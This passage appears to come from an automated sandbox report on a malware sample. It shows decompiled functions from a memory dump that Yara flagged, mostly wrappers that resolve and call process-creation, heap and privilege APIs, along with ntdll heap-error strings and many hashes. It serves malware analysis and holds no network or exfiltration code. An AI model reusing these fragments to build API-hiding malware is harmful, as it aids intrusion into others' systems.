                                                                        • Instruction ID: a92fe9ae98136920995dbb6c9f8f490c0a28fc78c4328f558ebb06bb2a3a51d6
                                                                        • Opcode Fuzzy Hash: 269900346b7c3cf1095cd121d9a13cafab3a846ac9cdea7f6ce23ea480356605
                                                                        • Instruction Fuzzy Hash: D1F04F763002156FDA24EF99EC84EE7736DEF88360B10855AFA4D9B201D931EA5587E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CreateExitInternal
                                                                        • String ID:
                                                                        • API String ID: 4273315900-0
                                                                        • Opcode ID: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                        • Instruction ID: 90963e86cd57150ed095c23e32252a4bc52356d2fee715913416bcb79a385e3c
                                                                        • Opcode Fuzzy Hash: 540bfc6e7dd3a05608229c53d547d5ceb1e2f8f92c80232f9867aac60bdf6548
                                                                        • Instruction Fuzzy Hash: B60117B2200208BBCB44DF99DC80DEB77ADEF8C354F118249FA0D97241DA34E951CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                                        				char _v67;
                                                                        				char _v68;
                                                                        				void* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				int _t14;
                                                                        				long _t22;
                                                                        				intOrPtr* _t26;
                                                                        				void* _t27;
                                                                        				void* _t31;
                                                                        
                                                                        				_t31 = __eflags;
                                                                        				_v68 = 0;
                                                                        				E00419D10( &_v67, 0, 0x3f);
                                                                        				E0041A8F0( &_v68, 3);
                                                                        				_t12 = E00409B10(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
                                                                        				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                        				_t26 = _t13;
                                                                        				if(_t26 != 0) {
                                                                        					_push(__edi);
                                                                        					_t22 = _a8;
                                                                        					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                        					_t33 = _t14;
                                                                        					if(_t14 == 0) {
                                                                        						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                        					}
                                                                        					return _t14;
                                                                        				}
                                                                        				return _t13;
                                                                        			}













                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                        • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E00418530(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                        				void* _t22;
                                                                        				void* _t33;
                                                                        				intOrPtr* _t34;
                                                                        
                                                                        				_t16 = _a4;
                                                                        				_t34 = _a4 + 0xc80;
                                                                        				E00418DB0(_t33, _t16, _t34,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
                                                                        				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                        				return _t22;
                                                                        			}







                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                        • Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
                                                                        • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                        • Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E004184B4(void* __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
                                                                        				intOrPtr _v0;
                                                                        				char _t12;
                                                                        
                                                                        				_push(0x3c);
                                                                        				 *((intOrPtr*)(__ecx + 0x5506bd67)) =  *((intOrPtr*)(__ecx + 0x5506bd67)) - __edx;
                                                                        				_t9 = _v0;
                                                                        				_t5 = _t9 + 0xc74; // 0xc74
                                                                        				E00418DB0(0x21c5d300, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                                        				_t12 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                        				return _t12;
                                                                        			}






                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                        • Instruction ID: c5ff80edf742f8a68fdad7a16a09cf22f23f4b8e9e8c60093caf9f0ba1e94a67
                                                                        • Opcode Fuzzy Hash: 217add93ce38b03714e6ccd2c066df5cfb3b48363690f25c7b28eacd6981adb7
                                                                        • Instruction Fuzzy Hash: ADE06DB1200304ABDB14DF65DC49EA7376CAF88750F114199FE085B382D531E901CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                        				char _t10;
                                                                        				void* _t15;
                                                                        
                                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                                        				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                        				return _t10;
                                                                        			}






                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 36%
                                                                        			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                        				intOrPtr _t9;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t15;
                                                                        
                                                                        				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                        				_t9 = _a12;
                                                                        				_t12 = _a8;
                                                                        				asm("les edx, [edx+edx*2]");
                                                                        				_push(_t9);
                                                                        				_t10 = RtlAllocateHeap(_t12); // executed
                                                                        				return _t10;
                                                                        			}








                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                        				int _t10;
                                                                        				void* _t15;
                                                                        
                                                                        				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                        				return _t10;
                                                                        			}






                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                        • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                                                        • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                                        • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d093b95bdabade9245981aec209fce9a94892cd2e036e304996a8908ac3ef710
                                                                        • Instruction ID: 464aa9e1f91d0331aabafe1aacb60773aa293d48df35639d53a1eb87655e6882
                                                                        • Opcode Fuzzy Hash: d093b95bdabade9245981aec209fce9a94892cd2e036e304996a8908ac3ef710
                                                                        • Instruction Fuzzy Hash: A0B09B729415D5C5E612D7A4460871B795077D1755F26C451D2020B45F4778C091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Strings
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0158B314
                                                                        • The instruction at %p tried to %s , xrefs: 0158B4B6
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0158B47D
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0158B2F3
                                                                        • *** then kb to get the faulting stack, xrefs: 0158B51C
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0158B38F
                                                                        • an invalid address, %p, xrefs: 0158B4CF
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0158B53F
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0158B39B
                                                                        • The resource is owned shared by %d threads, xrefs: 0158B37E
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0158B3C5
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0158B3D6
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0158B484
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0158B432
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0158B476
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0158B323
                                                                        • *** enter .cxr %p for the context, xrefs: 0158B50D
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0158B48F
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0158B352
                                                                        • This failed because of error %Ix., xrefs: 0158B446
                                                                        • a NULL pointer, xrefs: 0158B4E0
                                                                        • read from, xrefs: 0158B4AD, 0158B4B2
                                                                        • *** Inpage error in %ws:%s, xrefs: 0158B418
                                                                        • The critical section is owned by thread %p., xrefs: 0158B3B9
                                                                        • write to, xrefs: 0158B4A6
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0158B305
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0158B2DC
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0158B374
                                                                        • *** enter .exr %p for the exception record, xrefs: 0158B4F1
                                                                        • <unknown>, xrefs: 0158B27E, 0158B2D1, 0158B350, 0158B399, 0158B417, 0158B48E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 12be4aada026a1af60d7d3041c6a2cf8af332a670e7ed6b442a7b08c896e4f98
                                                                        • Instruction ID: 07dcf05759df0acd86fd6fa6ebaeb9b94b487e49e22c20e17798c60a091f328a
                                                                        • Opcode Fuzzy Hash: 12be4aada026a1af60d7d3041c6a2cf8af332a670e7ed6b442a7b08c896e4f98
                                                                        • Instruction Fuzzy Hash: BC81E079A40212FFDB216A4A8C56D6E3F2EBF96AA1F40005DF5043F132E7798551CAF2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E01591C06() {
                                                                        				signed int _t27;
                                                                        				char* _t104;
                                                                        				char* _t105;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t117;
                                                                        				intOrPtr _t119;
                                                                        				intOrPtr _t120;
                                                                        
                                                                        				_t105 = 0x14b48a4;
                                                                        				_t104 = "HEAP: ";
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E014DB150();
                                                                        				} else {
                                                                        					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				_push( *0x15c589c);
                                                                        				E014DB150("Heap error detected at %p (heap handle %p)\n",  *0x15c58a0);
                                                                        				_t27 =  *0x15c5898; // 0x0
                                                                        				if(_t27 <= 0xf) {
                                                                        					switch( *((intOrPtr*)(_t27 * 4 +  &M01591E96))) {
                                                                        						case 0:
                                                                        							_t105 = "heap_failure_internal";
                                                                        							goto L21;
                                                                        						case 1:
                                                                        							goto L21;
                                                                        						case 2:
                                                                        							goto L21;
                                                                        						case 3:
                                                                        							goto L21;
                                                                        						case 4:
                                                                        							goto L21;
                                                                        						case 5:
                                                                        							goto L21;
                                                                        						case 6:
                                                                        							goto L21;
                                                                        						case 7:
                                                                        							goto L21;
                                                                        						case 8:
                                                                        							goto L21;
                                                                        						case 9:
                                                                        							goto L21;
                                                                        						case 0xa:
                                                                        							goto L21;
                                                                        						case 0xb:
                                                                        							goto L21;
                                                                        						case 0xc:
                                                                        							goto L21;
                                                                        						case 0xd:
                                                                        							goto L21;
                                                                        						case 0xe:
                                                                        							goto L21;
                                                                        						case 0xf:
                                                                        							goto L21;
                                                                        					}
                                                                        				}
                                                                        				L21:
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E014DB150();
                                                                        				} else {
                                                                        					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				_push(_t105);
                                                                        				E014DB150("Error code: %d - %s\n",  *0x15c5898);
                                                                        				_t113 =  *0x15c58a4; // 0x0
                                                                        				if(_t113 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E014DB150("Parameter1: %p\n",  *0x15c58a4);
                                                                        				}
                                                                        				_t115 =  *0x15c58a8; // 0x0
                                                                        				if(_t115 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E014DB150("Parameter2: %p\n",  *0x15c58a8);
                                                                        				}
                                                                        				_t117 =  *0x15c58ac; // 0x0
                                                                        				if(_t117 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E014DB150("Parameter3: %p\n",  *0x15c58ac);
                                                                        				}
                                                                        				_t119 =  *0x15c58b0; // 0x0
                                                                        				if(_t119 != 0) {
                                                                        					L41:
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E014DB150();
                                                                        					} else {
                                                                        						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					_push( *0x15c58b4);
                                                                        					E014DB150("Last known valid blocks: before - %p, after - %p\n",  *0x15c58b0);
                                                                        				} else {
                                                                        					_t120 =  *0x15c58b4; // 0x0
                                                                        					if(_t120 != 0) {
                                                                        						goto L41;
                                                                        					}
                                                                        				}
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E014DB150();
                                                                        				} else {
                                                                        					E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				return E014DB150("Stack trace available at %p\n", 0x15c58c0);
                                                                        			}












                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: 147ee031601f2c989723ce167174ff51c9e853a6aa71cd1b4bb3f53c6f6bfd8a
                                                                        • Instruction ID: 1170444fa4db126e90f60d875f72c0858801f6afa49f2b4ad3e2bdaaeeb6701f
                                                                        • Opcode Fuzzy Hash: 147ee031601f2c989723ce167174ff51c9e853a6aa71cd1b4bb3f53c6f6bfd8a
                                                                        • Instruction Fuzzy Hash: 1961F43A620993CFDF51AB9AD4D992977E4FB15D71B1A802FF40A6F320D73498408B1B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E014E3D34(signed int* __ecx) {
                                                                        				signed int* _v8;
                                                                        				char _v12;
                                                                        				signed int* _v16;
                                                                        				signed int* _v20;
                                                                        				char _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				char _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int* _v48;
                                                                        				signed int* _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				char _v68;
                                                                        				signed int _t140;
                                                                        				signed int _t161;
                                                                        				signed int* _t236;
                                                                        				signed int* _t242;
                                                                        				signed int* _t243;
                                                                        				signed int* _t244;
                                                                        				signed int* _t245;
                                                                        				signed int _t255;
                                                                        				void* _t257;
                                                                        				signed int _t260;
                                                                        				void* _t262;
                                                                        				signed int _t264;
                                                                        				void* _t267;
                                                                        				signed int _t275;
                                                                        				signed int* _t276;
                                                                        				short* _t277;
                                                                        				signed int* _t278;
                                                                        				signed int* _t279;
                                                                        				signed int* _t280;
                                                                        				short* _t281;
                                                                        				signed int* _t282;
                                                                        				short* _t283;
                                                                        				signed int* _t284;
                                                                        				void* _t285;
                                                                        
                                                                        				_v60 = _v60 | 0xffffffff;
                                                                        				_t280 = 0;
                                                                        				_t242 = __ecx;
                                                                        				_v52 = __ecx;
                                                                        				_v8 = 0;
                                                                        				_v20 = 0;
                                                                        				_v40 = 0;
                                                                        				_v28 = 0;
                                                                        				_v32 = 0;
                                                                        				_v44 = 0;
                                                                        				_v56 = 0;
                                                                        				_t275 = 0;
                                                                        				_v16 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					_t280 = 0xc000000d;
                                                                        					_t140 = 0;
                                                                        					L50:
                                                                        					 *_t242 =  *_t242 | 0x00000800;
                                                                        					_t242[0x13] = _t140;
                                                                        					_t242[0x16] = _v40;
                                                                        					_t242[0x18] = _v28;
                                                                        					_t242[0x14] = _v32;
                                                                        					_t242[0x17] = _t275;
                                                                        					_t242[0x15] = _v44;
                                                                        					_t242[0x11] = _v56;
                                                                        					_t242[0x12] = _v60;
                                                                        					return _t280;
                                                                        				}
                                                                        				if(E014E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                        					_v56 = 1;
                                                                        					if(_v8 != 0) {
                                                                        						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                        					}
                                                                        					_v8 = _t280;
                                                                        				}
                                                                        				if(E014E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                        					_v60 =  *_v8;
                                                                        					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                        					_v8 = _t280;
                                                                        				}
                                                                        				if(E014E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                        					L16:
                                                                        					if(E014E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                        						L28:
                                                                        						if(E014E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                        							L46:
                                                                        							_t275 = _v16;
                                                                        							L47:
                                                                        							_t161 = 0;
                                                                        							L48:
                                                                        							if(_v8 != 0) {
                                                                        								L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                        							}
                                                                        							_t140 = _v20;
                                                                        							if(_t140 != 0) {
                                                                        								if(_t275 != 0) {
                                                                        									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                        									_t275 = 0;
                                                                        									_v28 = 0;
                                                                        									_t140 = _v20;
                                                                        								}
                                                                        							}
                                                                        							goto L50;
                                                                        						}
                                                                        						_t167 = _v12;
                                                                        						_t255 = _v12 + 4;
                                                                        						_v44 = _t255;
                                                                        						if(_t255 == 0) {
                                                                        							_t276 = _t280;
                                                                        							_v32 = _t280;
                                                                        						} else {
                                                                        							_t276 = L014F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                        							_t167 = _v12;
                                                                        							_v32 = _t276;
                                                                        						}
                                                                        						if(_t276 == 0) {
                                                                        							_v44 = _t280;
                                                                        							_t280 = 0xc0000017;
                                                                        							goto L46;
                                                                        						} else {
                                                                        							E0151F3E0(_t276, _v8, _t167);
                                                                        							_v48 = _t276;
                                                                        							_t277 = E01521370(_t276, 0x14b4e90);
                                                                        							_pop(_t257);
                                                                        							if(_t277 == 0) {
                                                                        								L38:
                                                                        								_t170 = _v48;
                                                                        								if( *_v48 != 0) {
                                                                        									E0151BB40(0,  &_v68, _t170);
